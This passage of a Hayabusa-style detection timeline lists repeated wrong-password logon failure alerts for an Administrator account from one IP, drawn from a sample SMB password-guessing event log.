NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
